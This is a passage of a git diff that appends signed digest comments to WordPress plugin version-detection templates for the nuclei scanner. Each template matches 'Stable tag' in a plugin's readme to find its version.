4e0cd86c3f..e24e2573de 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009a662fd0e8b542046eb2f4bc33561eb4cad45140690d1a2fbdb4e58246a77ba902200603bef835dcf94448fb6bc30025877d4deabbdd73ac4b663b7c9228c749fb08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 59eadc5e6e..da214d605d 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d9a809e17e4d71482265577bebc1ba659f85baa4c428e7a3511929e7608cc0bf0220205fe4464d064b258adb9a89a250c4a2360c294ab93bf07ca57c58510650d40a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 41f7a0075e..9fd9cd5656 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae16457fb8a8b1da0e9efb67e7ad2be08454661e36c9f94fb2e12bb4b9d5b60b022006cca9463ab38c4cc06a75ec0f792f23d3e50ee6322aca43590057c9399f9b80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 7e35a3fb4f..fd72a1e0de 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022035d6fdb62d06c9b7993f6742a3595a61a27b154d76f612b22c0a35fab2a28bf202210094075f04e32a3b3458c01141aaa6e3a7b298f1e198e70878378c58f90d03ac8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 18c2a7586e..fa07947ba6 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201f40d80db701c9dbd8cd8f0e99e556493432573828db8ec835b3cac5011b31bb02204f749f9de83a1dd693a1a9daa28bddbf5e6d37a02dc2fd73e66ccaf5a539ac04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 6bc2aa78f9..9995ad8aaa 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207147d2f3fca453afc3743a0d9261d2b0426559027f850701d22c0ea1f1236522022078674543cb5d0f1cd0df67f9acf09847db3feb2277ab75245c1ddc1169f0dcc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index a43d3352a2..03733b8db1 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220185f705766bc1e8ba3bdc76863046c6bfe6251ec36efc83a86497b7ba5cfc99a022100b6ec129d9b3960e3b08c4333a93727fb69e5cbfafaf8ceb7734c3131402e203d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..5db7d5ebb5 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100af6a6ee01aa5e0716fa888e19a140bf8717c84f277a1f2a4f7bffe0868f0fff2022100e6866e153a66f6d9efbed679eacb35d7279a05c4b15c0d96536865814820afb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..a64ae86367 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a4ad67de36ba452c0723c920dac767f1fd9483c03293e7f97e9569e78e2e3233022100b913eff8c1a358f6a21b0e87681ba0896de20eada88c83674c6e86d80cf182cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..2b2e5b3910 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5a86a83715474a762815156e6a84ea2056bf06cfdc63e35155d8b429ba168ee022036a783a209cf8f41a130a8f6c97ac941ed21d3c2f83336451eb744c82c6d43b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..5048b1cfcc 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c37d28c2c455c1f595cd1ee90a822318ca56e9659763001690d3cd0b1f030ab702200f0d47000be44932dc8575366e6e4d75b22e70d2cdd58419e03946d34ade6375:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..3dd14a1ee0 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202d9a2432d460f6674dc0f37b3fea4ad9c288b3a1390bb70e6b186737f6a0c7920220618a39b7c5e05509347c11b86f4e1355ae8f13ab80aacca269ab467fdef0469e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..cc2f86493f 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210092bc434d32c638674e6d3c5a5a55b218f72a053fa6926d3a4f4eb65fd75fcfa8022100d3c4357245cf68d3fd251d220b113fdb8fb37960e485b7f39d4c9ccb36f742fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..828ffae16c 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200d9927b4fa6320bcb40a6979256d3e4e99c61bdc6f7933828a1fcd376ae6d6f802203bc6709cb31dd6f3d239daaff92e4442c5fef666b20c88dfdf29388b3129389c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..5e098ba3f4 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b09f5af46aa953e27cadc7030a47ae00f081d7d3bf1e533565e1c40f8c513c92022100f858959d1a4466cb8cdab609a982b9016bfa164209f533515f282d3110278629:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..94649baf34 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008269bf4fe901412b3b42c47d9b2155ae368e179fb0dd5a78fc45ebade64e2faa022100a5228df1524301e32f3b0ff7a0f4de83c2051ec53ae36831c0d4321a3a31cda1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..1406ff1a7d 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022020511f6c1de1e846716a3317ff795f9b78a446ace6dfb651f93129788a25eff00221008e16ce945d3924b07796d77152e077475bb6a64dc1211add62ac86553561947c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..cfd8de4f96 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b15e4c435a428c54f5709857212718c9e2db6e627b532d09e62a57fa399df03702203293e17f57f6a3157cc7806f4e4947d6a5715709a6d935a1ac840f47b446d72b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..dfe8b6c942 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c39e8e59f9f69df5df80b158b9662914c34a93addfabf17cbe3525355916bad022100ae55e927eccf65e066f19237536757cf6b072512e9f825d5dc07801bc94635c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..139990b70e 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f2de9cd6e5a8f71d6174bcba1e1f68577833c86c232cdd65c12f97c5e4ed4165022066f89d9e723dfe1cee020417745a34b67664b51e319baf7bd941b7ea941f8695:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..3b9bb17588 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220340705f11205ba2e53c1e4e2aa46f1143290ec6cdd0a7f442161a7d0e7e9e9c6022030b4a5cebdeefcc68ae0628c22ef6795a3ce0b9ad660b0f5a098d15656673bf5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..01386642d0 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022026cc40e3e73c0c6b65cdfa11366abf4f8a49e7e17a3b143e432da4de562b6e95022039d690eac5b484937c112d6ed58f4640504057322201df981a47a1160f9398e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..929a7c2449 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203b6d55a84e5c378e5acb0c69d458dd6452eda7d86f2825f5674528f10be59e19022014b5cb6919be0f10c26b15ff703565aebea9aea3cb1c5608eea924c2feb2f712:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..afe23c5097 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ff6d14c10851c1070a455bd39670fea4430b7384c60395d970261e4ff9babe19022022701db514828fe5eed8c98771ff80cf72989fc450cddec1431c124f7345a82e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..f0169e4730 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207a5bf067f51f1024a5bcd89dc41a1c0a09b4347fe52ed566d16f303bd75db1a20221009c0a8ab5adbafeb3c689f2f0c4d4188cbed9b478e3ff5dacbe63d93f46d7900b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..0e067d29b5 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022071d9bd3f5c57ba5908946f28f786d090e5a85d5b7e76d6b69e7f301cca3d1121022026b5df0af5b366c45408dcb67664e063843743707ff1d69517be135fc1993e0b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..7d5d50b14c 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207c6e3274e90cf19bb841a9689a36d3c1f6d379b02b2a771f2e1f6e7e89a708ce022100e1547187f3f0e9f14b94dea2f77b12c30164c81c6dc4498ce85d4f78e658a522:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..51397c95b1 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200cd989fc7c8e20b6a83760d9aae1713e149bb96a62fce18667c1ec3b73e775ba02207966d041f1b16bd2fd7c0e33bd38732332448531c2d688b8b54646da902afc16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..deb314954c 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022000902a9a920a6eab11197982d102c4ba65970efcdf6d556c8ed09263be346e77022100fac915074abc270ef311abc6e762693543849af191a56143de289f2f91e69c66:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..7601b04479 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd508b2751eddcabcdff20d6bb8a1828e45bec5d040328d4fe5154a3492b24b20221008ceb6de1609d4c0997c9677fe71d33b840239f68501e396543c1b8e885c28144:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..7eb6880cde 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008c60ee08212aca9d843600372e87a9f4a9d7d11300e92ad8894560b67a71be9302206aa943664c8700391073905ca8e15bc974ad6164da8952023e05f06c2e951a1b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..9c4c4b3543 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205b4be7a7704d46205c25d37e8f14456f7f904433dde41610dc073ffc3a8275e6022100ac458e73aa8a7b93482cec595b910e77b9edaac3470eb87bf4ee831e45273c14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..adbc5f2a01 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae896b1301d3674d9500be4ef671983e5199ea50b9603f15f2b59783ee460cd5022050b360d91fabf00e4b23417d6f52f2c482bb6a2a550f900992505854b334a6cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..32706a10b2 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022054134b051359bad45851f2139f85868a6f570592ca3587cd795714f7055b2c3a022045d9ff12232a51d5d6527de05435bbd951629b8f00745997a9a7457c4df0bb05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..297f8a6ee1 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022031a0a11424d302218964ba75428dc340c0c783ea7b28286f908f4e9af678184b022100caef77a9b4402fd1e349c5439f590d82bfcfddc0e6c2ab7f735f602294b4f956:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..5f4f8fed97 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022023b3c7115df7f7b4a7bf2a4d1cdac7a90415ba094dc570edb3ec7b1e52ed835c0220127e9267597c7153e7031fe0b0861f826e4a46444165c63c8cb38b14d9d9175e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..cba0a643bb 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009be555f4c3f7a15b9f921ebd25f43ef309929448564485ee3ffafacdb686916f02207867fd0d2564e965a874733f302ddca646c36248350db90b8d2e59c63ffd6d8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..85548e3202 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100afab902835ebe06a4c3f6bda89add6b22f8b59d5949532a80c70e140ba1f92d102202083931d1e4fdcf829296d52d368cab1d562ee393bda30fa6dc668b8e6d71f77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..63e6970836 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a68024a4ac10a0a5a25a540e068c28e591833828663eb34a479d40b5dec60a6022100831b40a660b761a6a540e4fe8ba874904d4622a03658ef15eeb7ef9014dc3934:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..ef5ef0098a 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206b14504e91d2bfa06c79a61fb5d65b4ba9846c046465c5b3f5823a6e960ccb0a02210082e096ad503a4df33a6db77bdeeef642a7ee922c24c4ad66c31814b3c6805f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..8a4b6ab32d 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b57bdd5ea956da81d9eb5806e6206f7d7c718f8c1feae28fdfae3c9548b0f130220207774a8ca6f320dc5a32b6632a7cc91acf97a0de8df6d846f794399fe1983d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..e40b544335 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100b95983a70fa5717462902aff3f5e513a428e928530c97bc5428e9eead7c5b73c0220294caa2d40254a635049ef1cf946e7642a5b548b158244f5897dbc2b956ec261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..c838104005 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220237171643e0237a8118d83598b1b66d4cf2858948dc3e4dfb7a7b27e78e8f3fa022013aae9d90ed3a55ce1f8b02ea28fdbdc57541d4f5aad26a4df551fdda507054b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..55b1a5ed7f 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008926c686e954a7e38cc729821283c7cac69cb723d3c1ee5fa0b90faa870d7c3c022056e3ede1c4986e685b6bd70cd2f9bc7f69e4d31c99c41e8cb2bd9ece3a0b0a26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..0d8ee8452c 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210082c01583a98c1d17974cc2577ddc209c37191a047d911033746a745377898943022100f6cbc7e3116782ec93d07c8c974f1d959c1ade124040426793769cd040fb20c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..2a5c73a7b2 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220492f1157d41a51af303ece9140557f61e11c57791eb81587c3fbd5eaaa02056602203a9c3832f874e1f0e5836c17ca9c0e8fe0fe351454a5abb79956f54539003cf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..776f31b48c 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef352978cd787cb7966313e2ab6f27de7fb91ede5b3017180015f0249baad60602200fcd589a4c3c4083dd778ac320e00b7917069e6f75967129e49be1895f02d754:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..7d76cd5965 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 